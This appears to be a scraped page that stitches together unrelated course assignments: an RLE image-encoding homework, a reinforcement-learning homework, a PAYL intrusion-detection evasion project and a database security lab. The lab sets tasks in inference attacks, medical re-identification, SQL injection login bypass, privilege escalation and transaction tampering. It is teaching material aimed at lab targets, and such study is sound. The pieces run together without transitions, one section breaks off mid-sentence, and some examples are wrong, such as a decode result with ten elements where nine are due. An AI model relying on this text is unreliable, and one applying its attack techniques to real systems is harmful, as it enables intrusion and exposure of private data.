HW 3 and 4: RLE with Images PythonOverview In this project students will develop routines to encode and decode data for images using run-length encoding (RLE). Students will implement encoding and decoding of raw data, conversion between data and strings, and display of information by creating procedures that can be called from within their programs and externally. This project will give students practice with loops, strings, Python lists, methods, and type-casting.Run-Length Encoding RLE is a form of lossless compression used in many industry applications, including imaging. It is intended to take advantage of datasets where elements (such as bytes or characters) are repeated several times in a row in certain types of data (such as pixel art in games). Black pixels often appear in long “runs” in some animation frames; instead of representing each black pixel individually, the color is recorded once, following by the number of instances.0 0 2 2 2 0 0 0 0 0 0 2 2 0_ 2 0 3 2 6 0 2 2 1 0_ For example, consider the first row of pixels from the pixel image of a gator (shown in Figure 1). The color black is “0”, and green is “2”:Flat (unencoded) data:Run-length encoded data: . Figure 1 – Gator Pixel Image The encoding for the entire image in RLE (in hexadecimal) – width, height, and pixels – is:2 0 3 2 6 0 2 2 2 0 1 2 1 F 1 0 7 2 1 A F 2 1 0 9 2 3 0 1 2 1 0 3 2 6 0 3 2 3 0 8 2 5 0 1 E |1 6 W/ H/ ——————————————PIXELS———————————————–/Image Formatting The images are stored in uncompressed / unencoded format natively. In addition, there are a few other rules to make the project more tractable:1. Images are stored as a list of numbers, with the first two numbers holding image width and height. 2. Pixels will be represented by a number between 0 and 15 (representing 16 unique colors).For example, the chubby smiley image (Figure 2) would contain the data shown in Figure 3.Figure 2 Figure 3 – Data for “Chubby Smiley” NOTE: Students do not need to work with the image file format itself – they only need to work with lists and encode or decode them. Information about image formatting is to provide context. Requirements Student programs must present a menu when run in standalone mode and must also implement several methods, defined below, during this assignment.Standalone Mode (Menu) When run as the program driver via the main() method, the program should:1) Display welcome message 2) Display color test (ConsoleGfx.test_rainbow) 3) Display the menu 4) Prompt for inputNote: for colors to properly display, it is highly recommended that student install the “CS1” theme on the project page.There are five ways to load data into the program that should be provided and four ways the program must be able to display data to the user.Loading a File Accepts a filename from the user and invokes ConsoleGfx.load_file(filename): Select a Menu Option: 1 Enter name of file to load: testfiles/uga.gfxLoading the Test Image Loads ConsoleGfx.test_image: Select a Menu Option: 2 Test image data loaded.Reading RLE String Reads RLE data from the user in decimal notation with delimiters (smiley example): Select a Menu Option: 3 Enter an RLE string to be decoded: 28:10:6B:10:10B:10:2B:10:12B:10:2B:10:5B:20:11B:10:6B:10Reading RLE Hex String Reads RLE data from the user in hexadecimal notation without delimiters (smiley example): Select a Menu Option: 4 Enter the hex string holding RLE data: 28106B10AB102B10CB102B105B20BB106B10Reading Flat Data Hex String Reads raw (flat) data from the user in hexadecimal notation (smiley example): Select a Menu Option: 5 Enter the hex string holding flat data: 880bbbbbb0bbbbbbbbbb0bb0bbbbbbbbbbbb0bb0bbbbb00bbbbbbbbbbb0bbbbbb0Displaying the Image Displays the current image by invoking the ConsoleGfx.display_image(image_data) method.Displaying the RLE String Converts the current data into a human-readable RLE representation (with delimiters): Select a Menu Option: 7 RLE representation: 28:10:6b:10:10b:10:2b:10:12b:10:2b:10:5b:20:11b:10:6b:10Note that each entry is 2-3 characters; the length is always in decimal, and the value in hexadecimal! Displaying the RLE Hex Data Converts the current data into RLE hexadecimal representation (without delimiters): Select a Menu Option: 8 RLE hex values: 28106b10ab102b10cb102b105b20bb106b10Displaying the Flat Hex Data Displays the current raw (flat) data in hexadecimal representation (without delimiters): Select a Menu Option: 9 Flat hex values: 880bbbbbb0bbbbbbbbbb0bb0bbbbbbbbbbbb0bb0bbbbb00bbbbbbbbbbb0bbbbbb0Class Methods Student classes are required to provide all of the following methods with defined behaviors. We recommend completing them in the following order:1. to_hex_string(data) Translates data (RLE or raw) a hexadecimal string (without delimiters). This method can also aid debugging.Ex: to_hex_string([3, 15, 6, 4]) yields string “3f64”.2. count_runs(flat_data) Returns number of runs of data in an image data set; double this result for length of encoded (RLE) list.Ex: count_runs([15, 15, 15, 4, 4, 4, 4, 4, 4]) yields integer 2.3. encode_rle(flat_data) Returns encoding (in RLE) of the raw data passed in; used to generate RLE representation of a data.Ex: encode_rle([15, 15, 15, 4, 4, 4, 4, 4, 4]) yields list [3, 15, 6, 4].4. get_decoded_length(rle_data) Returns decompressed size RLE data; used to generate flat data from RLE encoding. (Counterpart to #2)Ex: get_decoded_length([3, 15, 6, 4]) yields integer 9.5. decode_rle(rle_data) Returns the decoded data set from RLE encoded data. This decompresses RLE data for use. (Inverse of #3)Ex: decode_rle([3, 15, 6, 4]) yields list [15, 15, 15, 4, 4, 4, 4, 4, 4, 4].6. string_to_data(data_string) Translates a string in hexadecimal format into byte data (can be raw or RLE). (Inverse of #1)Ex: string_to_data (“3f64”) yields list [3, 15, 6, 4].7. to_rle_string(rle_data) Translates RLE data into a human-readable representation. For each run, in order, it should display the run length in decimal (1-2 digits); the run value in hexadecimal (1 digit); and a delimiter, ‘:’, between runs. (See examples in standalone section.)Ex: to_rle_string([15, 15, 6, 4]) yields string “15f:64”.8. string_to_rle(rle_string) Translates a string in human-readable RLE format (with delimiters) into RLE byte data. (Inverse of #7)Ex: string_to_rle(“15f:64”) yields list [15, 15, 6, 4].Submissions NOTE: Your output must match the example output *exactly*. If it does not, you will not receive full credit for your submission!File: initials_HW{nu m}.py Method: Submit on CanvasDo not submit any other files!HW 3A (10 points) For this assignment, students will set up the standalone menu alongside the 4 requirements listed on page 2 of this document. In addition to this, students should also set up menu options 1 (loading an image), 2 (loading specifically the test image), and 6 (displaying whatever image was loaded) in order to help grasp the bigger picture of the project.This involves correctly setting up the console_gfx.py file and utilizing its methods. You will use ConsoleGfx.display_image(…) to display images. Notice how it takes in a decoded list. This is the format in which you will locally (in your program) store any image data that you are working with. When the document mentions that something is “loaded” it means that something is stored as a list of flat (decoded) data.HW 3B (90 points)HW 4 (100 points) For this assignment, students will now complete the final 2 methods on page 3 of this document as well as the remainder of the project involving the menu options and understanding how all the individual methods are intertwined with each other. You will submit your whole program including the 8 methods listed above and the main method. We will only test your remaining 2 methods and the main method in HW4 .
You are required to complete this homework individually. Please submit your assignment following the instructions summarized in Section 7. 1 Reinforcement Learning in Cliff-walking Environment In this assignment, you will implement Reinforcement Learning agents to find a safe path to the goal in a grid-shaped maze. The agent will learn by trail and error from interactions with the environment and finally acquire a policy to get as high as possible scores in the game. 1.1 Game Description Suppose a 12×4 grid-shaped maze in Fig. 1. The bottom left corner is the starting point, and the bottom right corner is the exit. You can move upward, downward, leftward, and rightward in each step. You will stay in place if you try to move outside the maze. You are asked to reach the goal through the safe region and avoid falling into the cliff. Reaching the exit terminates the current episode, while falling into the cliff gives a reward -100 and return to the starting point. Every step of the agent is given a living cost (-1).Figure 1: The cliff-walking environment The state space and action space are briefly described as follows: State: st is an integer, which represents the current coordinate (x,y) of the agent. Action: at ∈{0,1,2,3}, where four integers represent four moving directions respectively. 1.2 Implement Sarsa, Q-Learning, and Dyna-Q You are asked to implement agents based on Sarsa, Q-Learning, and dyna-Q algorithms. Please implement the agents in agent.py and complete the training process in cliff_walk_sarsa.py, cliff_walk_qlearning.py, and cliff_walk_dyna_q.py respectively. An agent with a random policy is provided in the code. You can learn how to interact with the environment through the demo and then write your own code. Hint: Take cliff_walk_sarsa.py as an example: • Line 27: more parameters need to be utilized to construct the agent, such as learning rate, reward decay γ, ε value, and ε-decay schema. • Line 47: the agent needs to be provided with some experience for learning. Hint: In agent.py: • You need to implement ε-greedy with ε value decay in the choose_action function. • Functions given in the template need to be completed. You can also add other utility functions as you wish in the agent classes. 1.3 Result Visualization and Analysis Result Visualization: You are required to visualize the training process and the final result according to the following requirements: 1. Plot the episode reward during the training process. 2. Plot the ε value during the training process. 3. Visualize the final paths found by the intelligent agents after training. Result Analysis: You are required to analyze the learning process based on the experiment results according to the following requirements: 2. Analyze the training efficiency between model-based RL (dyna-Q) and model-free alorithms (Sarsa or Q-learning). Please describe the difference in the report and analyze the reason in detail. 2 Deep Reinforcement Learning 2.1 Game DescriptionFigure 2: The lunar lander environment in this assignment This task is a classic rocket trajectory optimization problem. As shown in Fig. 2, you are required to control the the space-ship and land between the flags smoothly. In this assignment, you are required to train a DQN agent in “LunarLander-v2” gym environment. The definitions of state and action are given as follows: State(Array): The state st is an 8-dimensional vector: the coordinates of the lander in x & y, its linear velocities in x & y, its angle, its angular velocity, and two booleans that represent whether each leg is in contact with the ground or not. Action(Integer): There are four discrete actions available: do nothing, fire left orientation engine, fire main engine, and fire right orientation engine. More details of this gym environment is given in the documents of gym . However, information given in this file is sufficient for this assignment. 2.2 Read and Analyze the Deep Q-Network Implementation In this section, a complete DQN implementation dqn.py is given for the lunar lander task. You are required to read the code and understand the DQN training process. You are required to write comments in the code to point out the function or your understanding of each part of the code. Please fill in every “““comments: ””” (cf. dqn.py) with your understanding of the code. 2.3 Train and Tune the Agent In this section, you are required to train the DQN agent. Please show your training process (such as learning curve of episode return) and the training result (such as the game video of the final model) in the report. • (Requested) Tuning the hyper-parameters of the agent, especially gamma value, epsilon value, and epsilon decay schema. • Tuning the structure of the Q network. • Utilize multiple continuous frames of the game instead of one frame each time. • Other ideas. 3 Improve Exploration Schema There exists lots of other exploration strategies except ε-greedy. You are asked to find and learn one new exploration method, such as Upper Confidence Bound(UCB). Summarize the idea, pros, and cons of the new exploration method. Write your understanding in the report. 4 Installation You can follow the tutorial in this section to install the environment on Linux or Windows, and we strongly recommend you to use Linux system. 4.1 Install Anaconda Open the address https://www.anaconda.com/distribution/ and download the installer of Python 3.x version(3.8 recommended) for your system. 4.2 Install Required Environment After installing anaconda, open a Linux terminal and create an environment for Gym: conda create python=3.8 –name gym Then activate the environment conda activate gym Install gym and some dependencies pip install gym==0.25.2 pip install gym[box2d] pip install stable-baselines3==1.2.0 pip install tensorboard Install pytorch: Please follow the instructions given on the pytorch website . 5 Code, Demo Video, and Report Code: You can edit the code between “##### START CODING HERE #####” and “##### END CODING HERE #####”. Please DON’T modify other parts of the code. Demo Video: Videos (optional) should be in .mp4 format and a 10MB max for a single file . You can compress/speed up the videos. We recommend reocrding videos utilizing gym wrappers: “env = gym.wrappers.RecordVideo(env, ’./video’)”. More information is given in the gym docs . All the videos should be put into a folder called videos. Report: Summarize the process and results of the homework. 6 Discussion and Question You are encouraged to discuss your ideas, ask and answer questions about this homework. If you encounter any difficulty with the assignment, try to post your problem on Canvas for help. The classmates and the course staff will try to reply. 7 Submission instructions 1. Zip all your program files, experiment result, and report file HW3_report.pdf to a file named as HW3_ID_name.zip. 2. Upload the file to the homework 3 page on the Canvas.
○ how to build a machine-learning model based on normal network traffic.○ how to conduct a blending attack producing artificial network traffic that resembles the normal one, and bypass the learned model. We recommend that you use whatever is comfortable for you — either local set-up or the Linux VM provided. In the past, students faced no difficulty in setting up the project and working on either Windows or Macintosh OS.This project relies on the following readings: We have created a small quiz to help you understand the topics covered in this project. Please read the papers (under Readings and Resources) before attempting the quiz and the subsequent tasks. For each question, please enter your option in answers.txt as shown in the sample file below.Submit your answers for this part in answers.txt. You can find answers.txt under the project directory. NOTE: You may not see the marks you obtained for the quiz (and hence, the total marks of the project) to avoid students from brute-forcing the answers. We hide your total grade intentionally!!! You can either use the provided VM to complete the project OR you can set up your own environment locally.Desktop -> project 5HOWEVER: please use project5.zip in Canvas for the most updated version. TIP: Even if you are using the provided VM, please check SETUP.txt to understand how the project is set up and to get an overview of the various code components in the project. This might help in debugging any issues you might face later.The 2 videos on the Project 5 page are the previously recorded TA office hours. Our student found them extremely helpful. If you get stuck at any of the tasks below, we highly recommend that you watch the following videos first before you post your questions on Ed. Please refer to the reference readings to learn about how PAYL model works, in particular, 3.1.2: Code and data provided The PAYL directory provides the PAYL code and data for model training. Here is the workflow of the provided PAYL code: ○ Read the normal traffic data and divide it into two parts, 75% of the data for training and the rest 25% for testing (NOTE: You will NOT change these portions in the code).○ Sort the payload strings by length and generate a model for each length.○ Each model per length is based on [mean frequency of each ascii, standard deviation of frequencies for each ascii]. To run PAYL in training mode$ python3 wrapper.py $ python3 wrapper.py [FILE.pcap] where FILE.pcap is the data you will test. The figure shows a sample output from the wrapper.py. You will find mSF and mTMD values which make mTP>96% for both HTTP and DNS protocols respectively. The parameters can be different for the two protocols. Please report for each protocol that you used, the parameters that you found (output by wrapper.py) in a file named parameters.txt. Please report a decimal with rounded 2-digit accuracy for each parameter. NOTE: You are given a sample parameters.txt with dummy values in the PAYL directory. Please update the relevant values with your own answer. Check section 4 for more details.NOTE: The value for “DISTANCE” in parameters.txt will be obtained in the next task (section 3.2). Download your unique attack payload [YOUR_GTUSERNAME.pcap] from Files in Canvas, and place it in the PAYL directory of the Project 5 folder. For this part, you will verify that the model is effective for detection. You will ensure that the attack data does not fit the model, while the normal network traffic fits. Make sure you have completed Task A and that the parameters.txt file is set. Completing Task A and Task B will be essential to demonstrating the polymorphic blending attack in Task C. http_smoothing_factor = None dns_smoothing_factor = None http_threshold_for_mahalanobis = Nonedns_threshold_for_mahalanobis = None Note: You will only see these variable names if you download the ZIP files from Canvas. On the virtual machine (VM), the variables are named differently. $ python wrapper.py .pcap Note: We use python3 and the command will either be python or python3 depends on your local env if you download python locally on your own machine. (set the training_protocol parameter in wrapper.py) $ python3 wrapper.py http_artificial_profile.pcap(set the training_protocol parameter in wrapper.py)$ python3 wrapper.py dns_artificial_profile.pcap Please report the calculated distance of (where mDISTANCE is in the above figures) in parameters.txt for each protocol with the values of the attack payload (YOUR_GTUSERNAME.pcap) after completing Task B. We assume that the attacker has a specific payload (the attack payload) that they would like to blend in with the normal traffic. Also, we assume that the attacker has access to one packet (artificial profile payload) that is normal and is accepted as normal by the PAYL model. Preliminary reading: Please refer to the “Polymorphic Blending Attacks” paper. In particular, section 4.2 describes how to evade 1-gram and the model implementation. More specifically we are focusing on the case where m
Welcome to the Database Security project. This hands-on project is designed to help you understand how real-world data breaches occur and the strategies you can use to protect against them.Learning GoalsIn this project, you’ll explore two significant types of database vulnerabilities and how attackers exploit them:Topics CoveredFinal deliverablesYou will submit a single file named project_dbsec.json to Gradescope. A template is available at: /home/dbsec/Desktop/project_dbsec.jsonSee the Submission Details page for formatting and content guidelines.Important Reference MaterialValuable Information – Database Security PrerequisitesNOTE: Vital information is on the prerequisite page and not elsewhere!SubmissionVirtual MachineSupportedNot SupportedThis project uses Microsoft SQL Server Developer Edition, which runs on Linux inside the provided VM. The DBSec project is on the master VM, and the credentials for the Linux user will be provided in the project release on Canvas.Table of contents From Canvas – Database SecurityThe Database Security Project Release ED Discussion has all the information to get started!You will use the same VM you used in the earlier projects. If you need to download it again:For the DB Security project, this is the username and password:There is a limit of sixteen (16) submissions for the Database Security Project! FREQUENTLY ASKED QUESTIONS (FAQ) BACKGROUND AND SETUP:Project Scenario: Your First Penetration Test“Good News, Everyone!”You’ve just stepped into your new role at a penetration testing firm, and your first mission awaits. A portfolio of client websites has been placed before you, each resembling a digital fortress with hidden doors and potential cracks. It’s your responsibility to probe their defenses and uncover vulnerabilities before anyone else does.As you begin your review, familiar patterns start to emerge. The layouts, naming conventions, and user interfaces share striking similarities. A deeper look reveals the reason — the same software vendor developed all of these websites. This discovery is critical: any weakness found in one site could very likely exist across the entire portfolio, putting multiple clients at risk.Your objective in this mission is to identify and report those vulnerabilities. You’ll search for sensitive information that was never meant to be exposed, analyze how data is processed and protected, and test the applications against user input designed to bypass their safeguards. In doing so, you’ll step fully into the role of a penetration tester — wearing many hats and sharpening the skills essential to protecting databases and application security.Setup InstructionsThis project focuses on two common yet critical categories of database attacks: inference attacks and SQL injection. You will take on the role of a security analyst, tasked with identifying, exploiting, and reporting these vulnerabilities, all within a controlled environment designed for learning and exploration.To get started, follow the setup steps carefully. Precision matters here — even a slight misstep could cause confusion or errors later in the process.Username: Provided on project release in Database Security Project Canvas postPassword: Provided on project release in Database Security Project Canvas postDbGateThis is required for Task D and I (extra credit). Any testing can be done online with SQLFiddle; however, if you want a more realistic setup for testing, 3 blank databases are provided and can be accessed via DbGate.SetupDbGate is a cross-platform database tool designed for ease of use and the simultaneous management of multiple databases. It offers powerful features like schema comparison, a visual query builder, data charts, and tools for importing and exporting large amounts of data.Location in the VMDbGate Connection Procedure GATECH ID – GTIDProject Time ExpectationsBased on feedback from students in previous semesters, the time required to complete this project is roughly divided as follows:This estimate does not include time spent on extra credit opportunities (such as the Defender Task). Because some tasks may require thoughtful analysis and trial-and-error, it is strongly recommended that you start early to avoid last-minute difficulties.Everyone works at their own pace, and skill sets vary—don’t be hard on yourself if you find you’re taking more time than estimated.Feel free to post in the appropriate threads if you have questions about the project that aren’t addressed in the Write-Ups or have already been asked and answered on Ed. The TA team will be more than happy to help. TASK A: GTID VERIFICATION(flag0 – 0 pts)NOTE:** Task A is the setup task and contains **one flag**: flag0. **Please review the Submission Details for specific instructions regarding the format.This task sets up the project and generates hashes for the other flags, so verifying that the hashes are correct in Gradescope is critical. (USE A SUBMISSION)ImportantSteps to earn flag0Where can I find my GTID? Submission DetailsCheck the validity of your JSON before submitting to Gradescope.See Submission Details for more information. TASK B: INFERENCE ATTACK #1(flag1 – 20 pts)NOTE:** Task B is an array flag and contains **one flag**: flag1. **Please review the Submission Details for specific instructions regarding the format.What Is an Inference Attack?An inference attack isn’t a hack in the traditional sense—there’s no breaking into systems. Instead, it’s a method of deducing confidential information by analyzing seemingly harmless data that is available to many people either globally or within a company. Security regarding an inference attack deals with data confidentiality and providing data access/restriction on a need-to-know basis.In most organizations, data security is enforced by access controls, which might restrict:However, even when data access controls are in place, attackers (or curious employees) can sometimes combine multiple safe reports to uncover private information.This is called an inference attack. You don’t have direct access to sensitive data, but you can infer it from the data you do have. Such attacks often exploit standard reports available to many employees. For example, a company might restrict certain columns to enforce access control, creating an employee roster report that everyone can view but excluding sensitive details like salary. However, if other reports are not carefully designed with the same protections, they may unintentionally reveal that information.Scenario OverviewYou’ve been given four internal reports from a single company:Individually, none of these reports violates the company’s access controls on sensitive HR data. However, with some clever analysis, you realize the reports can be combined in a way that exposes a serious gap, allowing someone to pinpoint individual salaries.Your GoalBy analyzing and cross-referencing the reports, you must cleverly combine the data to identify specific employees whose salaries you can infer with 100% certainty.To complete Task B, for each exposed employee:Save this information in the JSON file as part of your submission for flag1.Success CriteriaTips for SuccessSteps to earn flag1(Each page opens in a new tab.)HintsSubmission DetailsGood luck with Task B! After completing this task, move on to Task C.Check the validity of your JSON before submitting to Gradescope.See Submission Details for more information. TASK C: INFERENCE ATTACK #2(flag2 – 20 pts)NOTE:** Task C is an **array flag** and contains **one flag**: flag2. **Please review the Submission Details for specific instructions regarding the format.OverviewNow that you’ve seen how an inference attack can expose sensitive information within a single company, it’s time to explore how the same technique can compromise data by linking together unrelated datasets.In this task, you will carry out another inference attack — but on a broader scale. Instead of one source, you’ll work with four independent datasets that are publicly available online. Each comes from a different domain: hospital visits, voter registration, insurance claims, and medical codes.Your mission is to analyze these datasets to identify specific individuals who have undergone certain medical procedures, while respecting the deidentification rules designed to protect privacy. Your task is to show how separate anonymized datasets can be combined to reveal sensitive information. Specifically, you will link medical data, particularly procedure records, to voter registration data to identify individuals and their associated medical history. This exercise highlights how incomplete deidentification, when paired with publicly available data, can still expose private information. This is, of course, a significant breach of HIPAA regulations (in fact, this exercise was inspired by the incident where the medical history of the governor of Massachusetts was made public in a similar fashion). Read more.What you need to doSteps to earn flag2(Each page opens in a new tab.)HintsSubmission DetailsGood luck with Task C! After completing this task, move on to Task D.Check the validity of your JSON before submitting to Gradescope.See Submission Details for more information. TASK D: INFERENCE ATTACK #3 – using DbGate(flag3 – 7.5 pts)NOTE:** Task D contains *one flag: flag3.* **Please review the Submission Details for specific instructions regarding the format.OverviewTask: Inference Attack on Encoded Patient DataYou are tasked with investigating a potential security vulnerability in your company’s patient database. This requires performing an inference attack to determine whether sensitive data can still be uncovered despite the use of encoding measures.BackgroundYou’ve learned that the database administrator attempted to secure patient data by:This database supports a Pediatric Office within the system.During a recent visit with your child, you noticed a sign-in sheet openly displayed at the front desk. The sheet contained the following information:You discreetly photographed the sheet, which can be accessed through the Task D Menu link.ResultDespite encoding efforts, you can derive the following sensitive information for at least one patient that is not on the sign-in sheet:Steps to earn flag3HintsSubmission DetailsGood luck with Task D! After completing this task, move on to Task E.Check the validity of your JSON before submitting to Gradescope.See – Da for more information. TASK E: SQL INJECTION #1(flag4 – 3 pts | flag5 – 5 pts | flag6 – 7 pts)NOTE:** Task E contains **three flags**: flag4, flag5, and flag6. **Please review the Submission Details for specific instructions regarding the format.Introduction: What Is SQL Injection?This task highlights one of the most common yet preventable database vulnerabilities: SQL Injection (SQLi). SQL injection occurs when user input is not properly validated, allowing attackers to inject or modify SQL statements. The consequences can be severe, ranging from unauthorized access and data exposure to complete system compromise.The root cause of SQL injection is often careless coding and weak input validation. Developers must ensure that all user-provided data is carefully inspected and that potentially harmful input is sanitized or blocked before reaching a SQL query. This process, known as input sanitization, prevents malicious commands from being executed and protects the database from manipulationTo help you get started, we recommend reviewing online resources like the SQL Injection Cheat Sheet for an overview of techniques and examples.To complete this task, you will need to craft basic SQL code that can be entered into a form’s input field and executed by the website as part of a valid — but unintended — SQL statement. The goal is not to write complex queries, but to bypass weak SQL injection defenses. This could involve evading security checks, retrieving unauthorized information, or, in severe cases, altering the site’s data. Once a vulnerability is present, successful exploitation depends on your ability to understand or map the database’s structure.Task DescriptionIn this task, you will work with a sample web application that contains intentional SQL injection vulnerabilities in three different login implementations. Your objective is to exploit these flaws to bypass authentication and capture the corresponding hash flags.You’ll log in using your GTID (as entered in Task A). You won’t know the actual password — instead, you’ll attempt SQL injections via the password field to force a successful login.Objective BreakdownTask E consists of three parts, each increasing in complexity. The site is updating its Legacy Login page, and all three hashes for Task E will change. The main security check on the legacy page is a direct match of the username, your GTID. You will not know the password needed to access the system, and you will not be provided with it.Steps to earn flags 4, 5, & 6(Each page opens in a new tab.) Where’s My GTID?If you’re unsure of your GTID, refer to the Submissions & Gradescope page for instructions.Hints & TipsFor flag5 and flag6Sanitization ConsiderationsSQL Injection HintsReference: Legacy Login CodeSubmission DetailsOnce you have the hashes for all three flags, please copy and paste them into your submission JSON.Good luck with Task E! After completing this task, move on to Task F.Check the validity of your JSON before submitting to Gradescope.For submission instructions, refer to the Submission Details page. TASK F: SQL INJECTION #2 / INFERENCE ATTACK #4(flag7 – 7.5 pts)Note:** Task F is an **array flag** and contains **one flag**: flag7. **Please review the Submission Details for specific instructions regarding the format.OverviewIn this task, you’ll combine your knowledge of SQL Injection (SQLi) and Inference Attacks to identify specific students from a fictional grade list who received an “F” in the class.You’ll start by performing an SQL injection to bypass the login form and gain access to a restricted section of the site. Once logged in, you’ll encounter a security question. To answer it, you’ll use Open-Source Intelligence (OSINT) techniques — methods commonly employed by social engineers to gather publicly available information and exploit it for unauthorized access.If you complete both stages (SQLi and OSINT), you’ll access extended roster data and use an inference attack to identify students who failed the course.What is OSINT?OSINT stands for Open-Source Intelligence. It refers to the practice of collecting and analyzing information from publicly available sources — essentially, anything you can legally access online or offline without hacking or breaking into systems.For example, imagine you’re working on a school project about climate change. You might research news articles, government reports, YouTube videos, and social media posts to gather insights. That’s OSINT in action — using open sources to build practical knowledge.Learn more about it here – What is OSINT?ObjectiveYour goal is to:Steps to CompleteHints & GuidanceSubmission DetailsOnce you identify the students who received an “F”, add the hashes (no particular order) into the flag7 array before proceeding to Task F (order of report does not matter).Good luck with Task F! After completing this task, move on to Task G.Check the validity of your JSON before submitting to Gradescope.For detailed submission guidelines, refer to the Submission Details page. TASK G: SQL INJECTION #3(flag8 – 7.5 pts / flag9 – 7.5 pts)NOTE:** Task G contains **two flags**: flag8 and flag9. flag9 is reliant on the “partial completion” of flag8 (while you do not need the hash for flag8 to complete flag9, you do need the schema). **Please review the Submission Details for specific instructions regarding the format.OverviewIn Task G, you’ll perform two advanced SQL injection attacks targeting a fictional music store database. These attacks will help you:Understanding the “Schema” Page and Your GoalYou’re working with a music store’s website that has a search engine for music albums. While exploring the site, you’ve found a page called “schema.” This page shows behind-the-scenes information — specifically, the structure (or metadata) of a database table used in the main report.What You’ve NoticedWhat You KnowWhat You Need to DoTask Breakdownflag8 – Privilege Escalation via InjectionThe Schema page reveals metadata for the Music table. This view is read-only and tied to a limited-access database user named Schema.The Report page uses this same schema to generate queries. Your job is to figure out how to extend the Schema user’s access, so it can view more than just the Music table.Once you succeed, the Schema page will show additional tables. You will notice that the new table does not have a hash. There is a reason for this:To obtain the hash, you must create the required privilege escalation using the “search” functionality on the Report page. When successful, the new hash will appear in the schema header. That hash is your flag8.flag9 – Credential Extraction and LoginAfter gaining visibility into new database tables, you must construct another SQL injection on the Report page. This time, your injection should extract a username and password from another table.You’ll then log into the Login page using the credentials you uncovered. If successful, you’ll land in a simulated “management console,” where your flag9 hash will be displayed.Unlike the other login forms thus far, this login page is locked down, and SQLi will not work. You are more than willing to try, but as the great DBA Obi-Wan Kenobi said:How to Proceed(Each page opens in a new tab.)Steps to earn flag8 & flag9flag8 Hashflag9 HashHints & TipsGeneralflag8flag9URL ExplorationSecurity ModelSubmission DetailsOnce you’ve obtained the hashes, add them to your submission JSON and check the files for any formatting issues before submitting to Gradescope.Good luck with Task G! After completing this task, move on to Task H.Check the validity of your JSON before submitting to Gradescope.See Submission Details for more information. TASK H: SQL INJECTION #4(flag10 – 7.5 pts / flag11 – 7.5 pts)NOTE:** Task H contains **two flags**: flag10 and flag11. flag11 is reliant on the completion of flag10 (or you can choose to use your GTID for the username and password, but not receive a hash for flag10). **Please review the Submission Details for specific instructions regarding the format.OverviewYou’re testing the security of a banking website that allows users to log in and view transaction history. Your objective is to prove the system is vulnerable through two stages of SQL injection attacks :Steps to earn flag10 & flag11flag10 – Login Without UsernameGoal: Log in to the banking site without knowing a valid username. You must use SQL injection in both the username and password fields to:Key Hints:What success looks like:flag11 – Tamper Transaction HistoryGoal: Once logged in, you’ll see 10 transaction entries and a balance. One entry will be an overdraw fee (-$25). You must:Critical Part: You can’t inject into text boxes. You must modify the form payload via Chrome Developer Tools before the form submits. You are altering the data sent to the server, not to the UI!How to Execute flag11NOTE: This backend expects/uses JSON.NOTE: If anything is off (wrong balance, 11 transactions, or an overdraw still exists), the hash will be wrong.Hints Recapflag0flag11Submission DetailsOnce you’ve obtained the correct hashes, submit your JSON file on Gradescope after checking for JSON formatting issues.Good luck with Task H! After completing this task, move on to Task I (REMEMBER: Task I is extra-credit).Check the validity of your JSON before submitting to Gradescope.See Submission Details for more information. Task I: Defend Against Inference and SQL Injection Attacks(flag12 – 20 pts)NOTE:** Task I is an **array flag** (Inference – Elements 1-3 → 10 pts / SQLi – Element 4 → 10 pts) and contains **one flag**: flag12. **Please review the Submission Details for specific instructions regarding the format.OverviewIn this task, you’ll shift from attacking to defending. Instead of exploiting vulnerabilities (as in Tasks A–G), you’ll write SQL to prevent inference and SQL injection (SQLi) attacks.NOTE: All validations will initially show yellow (not run). Click the Run test button next to each to validate individually.Accessing the Test Pages(Each page opens in a new tab.)Part 1: Inference Defense (flag12 Elements 1–3)View: TitleGenderAgeReportTGA Report De-Identification RulesTGA Format RulesView: DepartmentEthnicityDurationReportDED Report De-Identification RulesDED Format RulesPart 2: SQL Injection Defense (flag12 Element 4)Procedure: uspSQLReplaceTipsReset Code (If Needed)— Reset TitleGenderAgeReportALTER VIEW [dbo].[TitleGenderAgeReport] ASSELECT *FROM CompanyEmployees;GO — Reset DepartmentEthnicityDurationReportALTER VIEW [dbo].[DepartmentEthnicityDurationReport] ASSELECT *, ” AS DurationFROM CompanyEmployees;GO — Reset uspSQLReplaceALTER PROCEDURE [dbo].[uspSQLReplace](@tblName varchar(64), @colName varchar(64), @colValue varchar(1024), @colDataType varchar(32), @filter varchar(1024) OUTPUT)ASBEGINDECLARE @sql nvarchar(max);DECLARE @param nvarchar(64);DECLARE @found int = 0; SELECT @filter = @colValue; /*Student Code Should Go Here*/END;GODbGate:Below is how to edit a view:Submission DetailsInclude your flag12 hash (array of 4 elements) in the JSON file and submit it to Gradescope!Good luck with Task I!Check the validity of your JSON before submitting to Gradescope.See Submission Details for more information. SUBMISSION DETAILS:File Submission InstructionsThis project must be submitted through Gradescope, which you can access via Canvas.How to SubmitMake sure you validate your JSON file before submitting! Use https://jsonlint.com to check your JSON file format.Important Notes About Gradescope BehaviorGradescope uses an auto-grader to evaluate your submission. Please be aware of the following:Submission Limits and ResponsibilitiesTo avoid this:JSON File Format and Editing GuidelinesThe file you will submit is called: project_dbsec.jsonThis file is available on the Desktop of the provided Virtual Machine. If it is missing, you can create one from scratch by copying the format below (see final section).File Editing RulesSpecial Formatting Instructions for Array FlagsTemplate Format for project_dbsec.jsonNOTE: New line added after every element is for clarity and **should not be used **, as it can cause the JSON to become invalid. You are responsible for ensuring your JSON is valid before submission.{“flag0”: “”,“flag1”: “[‘_’,‘_’,‘_’,‘_’,‘_’,‘_’,‘_’,‘_’]”,“flag2”: “[‘_’,‘_’,‘_’,‘_’,‘_’,‘_’,‘_’,‘_’]”,“flag3”: “__”,“flag4”: “”,“flag5”: “”,“flag6”: “”,“flag7”: “[‘’,‘’,‘’,‘’,‘’,‘’,‘’,‘’]”,“flag8”: “”,“flag9”: “”,“flag10”: “”,“flag11”: “”,“flag12”: “[‘’,‘’,‘’,‘’]”}NOTE: The number of entries for an array flag, except Flag12, are mere examples and do not suggest the total number of flags; this is an added challenge. In reality, the number of flags can be less or more than the example flag count for each array flag.An example of what the submitted file content should look likeIf you need to recreate the file manually, use this template structure. Replace the placeholders with your actual flag values:{“flag0”: “f64c3063af19c10afeeec201ce07a92627dbfe2ad594b5729c719d7727c1”,“flag1”: “[‘a478e5926bce_85650.00’, ‘dd94bd958dba_132950.05’, ‘d958dbd94bda_119950.15’, ‘dd94958dba_79950.10’, ‘dbdd94bd958dba_85950.35’, ‘dd94bd958dba_102450.55’]”,“flag2”: “[‘164266c8e971_97760’, ‘3b70f2b5b53c_96319′, 